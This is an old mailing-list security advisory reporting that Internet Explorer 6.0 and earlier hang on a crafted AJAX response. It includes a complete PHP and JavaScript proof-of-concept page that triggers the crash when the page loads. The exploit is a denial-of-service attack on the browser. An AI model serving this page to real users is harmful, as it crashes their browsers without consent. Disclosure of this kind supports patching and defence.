<<< Date Index >>>     <<< Thread Index >>>

Internet Explorer AJAX Bug



Summary:
Internet Explorer 6.0 and below hangs when entering prepared page

Details:
When using AJAX (Asynchronous JavaScript and XML) to load page content 
dynamicly we are allowed to do anything on the side of server. Internet 
Explorer process hangs when Content-type header is sent within.

Vulnerable Versions:
Internet Explorer 6.0 and below, tested on Windows XP, 2000 and 2003.

Patches/Workarounds:
Unknown.

Exploits:
Execute the following PHP script in IE to cause it's process to die.

<?php

    if (@$_SERVER['QUERY_STRING'] == 'ajax') {
        /**
            Sending this header causes Internet Explorer to hang.
        */
        header('Content-type: text/html; encoding=utf-8');
        echo "\n";
        exit;
    }

?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="pl" lang="pl">
<head>
  <title></title>
  <script type="text/javascript">
  
    function pageLoad() {
    
        xmlHttp = false;
        try {
            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {
                xmlHttp = false;
            }
        }
        if (!xmlHttp && typeof XMLHttpRequest != 'undefined')
          xmlHttp = new XMLHttpRequest();
        if (!xmlHttp)
          return;
        xmlHttp.open("GET", "?ajax", true);
        xmlHttp.send(null);        
    }
  
  </script>
</head>
<body onload="pageLoad()">
</body>
</html>


Discovered by
&#321;ukasz Lach
anakin[at]php5[dot]pl